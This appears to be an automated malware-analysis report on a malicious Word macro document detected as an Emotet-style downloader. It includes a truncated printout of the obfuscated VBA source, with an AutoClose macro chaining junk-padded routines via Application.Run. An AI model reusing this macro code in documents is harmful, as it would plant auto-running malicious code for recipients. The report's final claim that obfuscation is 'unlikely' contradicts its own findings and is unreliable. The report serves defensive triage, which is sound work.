Verdict: MALICIOUS
Risk score: 262

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment

Malware Insights
The file is identified as malicious by ClamAV with the signature Doc.Malware.Emooodldr-6711604-0. Static analysis revealed VBA macros, specifically an Auto_Close macro that uses CreateObject, indicating an attempt to execute code. The VBA code is heavily obfuscated but contains calls to Application.Run, suggesting it is designed to execute a secondary payload, likely downloaded from an external source. Note that the Application.Run targets visible in the extracted source preview (for example "pDxcjpIWpwDZSu") are other procedures defined in the same module, so the visible calls chain through internal junk-padded routines; the download or execution logic is not shown in the truncated preview.
Heuristics (6)

- ClamAV: Doc.Malware.Emooodldr-6711604-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): document contains a VBA project, i.e. VBA macros are present
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE)
- CreateObject call (high, OLE_VBA_CREATEOBJ)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All URLs below were found in document text (OOXML body / shared strings) and are standard Office/OOXML XML namespace identifiers that appear in ordinary Word documents; none of them is a network indicator for this sample.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13499 bytes |

SHA-256: ce3f81c5e77af5dfd327a246ea0580e33df6f3619de233a8796c9a28608a06df
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub LqJvoKfPbxKkoH()
irqWkSLOy = Atn(470.7) - Atn(956.84) - Atn(869.21) - Atn(554.68) - 854.21
XBKVGjY = 289.66 + Atn(148.69) + 671.88
HjOTVWWZ = "GIZFf" + "KzOxkDWQXnJxSB" + "NAuS"
upycRfOgik = Atn(932.87) - 595.18 - Atn(146.38) - Atn(305.78)
OrzHgRi = "uHqRoiRunqMOLgk" + Left("pWyJNoQEoN", 6) + "yEYRRcWvIxp" + Left("YbWjRQWfyN", 2) + Left("xzFdSTpHNp", 2)
TbyxMfO = "jcgbiJWZXkuW" + "EXuLbvwviWkWcF" + "HESOUDSBN"
LEKBqHgN = "y" + "SEPizWYvZqiPU" + LTrim("gqOHdVoFRWPpTxKCkSHHkBQCTQZANX")
Application.Run "pDxcjpIWpwDZSu"
WWbjjBMv = Atn(133.79) - Atn(288.96) - Atn(324.14) - Atn(834.5)
LFMFLwfVfDrH = "fr" + RTrim("nguG") + "qbIQqxgCkiwqfFogIvcCRK" + LTrim("znnBnYcSr")
FuxdTyPu = Atn(406.79) - Atn(279.11) - 417.16
ESjkHFqE = Atn(340.94) + Atn(932.99)
kGYGIQGWKfPI = Left("WHOByCwJPp", 3) + "YJEo" + Left("UIfuYqXLGD", 5)
ZuFTJugcNw = Left("nTCACzGyLY", 9) + Left("GLirSIggUX", 5) + "DLfjiSW" + "WcTuJgnbkwBT"
cHYjfiygBwpK = "nTQyNQ" + Left("gIiWkvOvpx", 7) + Left("OvFvUZrEPn", 6)
End Sub
Sub OWFozFGyHIfuHG()
yCqCFvGdbkKz = "xXuYYH" + "wSkuzDjNFdSqWx" + Left("uPPJUfzjxL", 7)
zZDJxoFVd = 210.8 + Atn(857.9) + Atn(376.27) + 237.71
Application.Run "OvJCfVYjCpTxqPyw"
TjTRyoWnJG = Left("gcXWurEjuc", 4) + "KMHyUXdBkKMU"
bDWDHpD = "iDKKGDdKfLqTEYVYpSco" + "wxOMEYoWD"
gppJJPoKxDLr = 916.3 + 402.59 + Atn(198.1) + Atn(775.35)
HEpAJbjFPQ = "TEKF" + RTrim("LxyiUXTBbURPgQbAHQKrBACJkSLwL") + "CQJPEbvJrxrqNBoYvxwIdMzD"
End Sub
Public Function YcWJXvyFnDMQu(RoizIzPyJJBrzbzVTf, HBZCpkvEiCjNjxd, JqnVzkfRSFUOOwizD)
FfBkBgzik = Atn(766.1) + Atn(257.19) + Atn(654.96) + Atn(924.89)
AJQFgPyq = 552.27 - Atn(204.12)
KTqvTyHHC = 260.2 + 70.1 + 379.29
YcWJXvyFnDMQu = Replace(RoizIzPyJJBrzbzVTf, HBZCpkvEiCjNjxd, JqnVzkfRSFUOOwizD)
AbVbxGRy = 712.35 + 145.97 + 429.18 + 656.23 + 420.83 + Atn(815.18)
TPLnWER = Left("QzFfdBLIib", 2) + Left("FXPEbNwdUH", 4) + Left("gGZnyjHfbS", 9)
rfXuHUiAJD = 549.59 + Atn(57.9) + 486.88 + 53.77 + Atn(478.12) + Atn(979.78)
NDjMXPI = 525.16 + 813.82 + 105.9 + Atn(999.74) + 585.97 + Atn(458.48)
QRjgcJHvjWdP = 358.43 - 629.97 - 6.2 - Atn(711) - 459.7 - Atn(472.12) - Atn(467.65) - Atn(663.9)
bwXJwzTSZV = "fvDRKcdfQNupgf" + LTrim("LDdkcfzSzz") + "XScpLGD" + "KUdIqLkHCivkdDbAoLn"
JAkkxOofLG = Left("unCVDWZKRw", 8) + Left("vSfjoHAgSc", 6)
uroncKu = LTrim("fbOjOXKAdoqkZ") + LTrim("F") + "uXTO" + "UEAOXJSPZOCgzWGJoORLTw"
BuEpdFEUOxJ = 437.71 - 745.9 - Atn(137.63)
gfBOFNCRKq = 388.3 - Atn(503.34)
PXcwXbc = "xxbpHzrXx" + "OxTXxovMuOpfkMWGbupfCqCjIQ" + RTrim("PpUYYMKFDGEGnQdOAUv")
End Function
Sub pDxcjpIWpwDZSu()
UpnRTqzIV = Left("wZFqjGGfzO", 3) + "HpQNZr" + Left("BWpKBqnzXU", 5)
AZkUokWcX = 342.73 + 363 + Atn(491) + Atn(945.55)
RqdFWGE = Atn(878.38) - Atn(504.27) - Atn(692.25) - Atn(909.43) - 123.4
PEMyyWrCSdp = LTrim("Tf") + "IZKRXffYbNcDvZPrQDZJWuV" + RTrim("ZEPokAf") + LTrim("ApQA") + LTrim("xyEQ")
YknxcOjiKAX = Atn(648.51) - Atn(440.5) - Atn(951.61) - Atn(145.45) - Atn(495.1)
HpMxnWiMX = "CffCkOJDHpgfXzARZIgRWLfKBYTAR" + RTrim("bfNyYbVFEGzyDPRKqdpGIy") + RTrim("YLdJYSvY")
FUAnQFRb = 865.4 + Atn(568.23)
Application.Run "kBRfkbCiIVNzgT"
GoMMXfkvSf = RTrim("jOTuJMDpKdwSBJyJORfPNzyQgQR") + RTrim("CFNrRDCPA") + "BFqJAGC" + RTrim("InKQJKLfBBRdGNqIWbPdZAEpOHq")
MNToCCHF = "ZUiXYIiIRxHOjSWOcrVKfx" + RTrim("QAFYUPKycSr") + "GfwI"
AGPkjXY = "TwLLOuIZYxD" + Left("BwwITHfbAn", 5) + "JFbWiIoBfbX"
End Sub
Sub AutoClose()
ZSINbyL = Left("VXNrvTHLWY", 10) + Left("zYfdOArcgE", 1)
FgBduyyVfV = "RKqq" + "PcPJCPwzFU" + Left("OLziqcvNSu", 10) + Left("rrWBxOoBxw", 10)
zQgGoyjyCGSD = Left("gvZjPYErwk", 1) + "nVIkpHNJV" + "yB"
xKPDROn = Left("FFHVEbprCb", 6) + "nEiZnubxk" + "pPIw" + "xyARooFRu"
Application.Run "ZyyirJIXvZTAby"
uMJDyiPH = "vYBAMSW" + "DqGMFCOJULNxU" + "wCU" + Left(
```

... (truncated)
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 38400 bytes |

SHA-256: dacdef69c4c7737ddaf7de97f6a3f5429e548cb21cb7b76d0a57da334046236f

Detection
- ClamAV: Doc.Malware.Emooodldr-6711604-0
- Obfuscation or payload: unlikely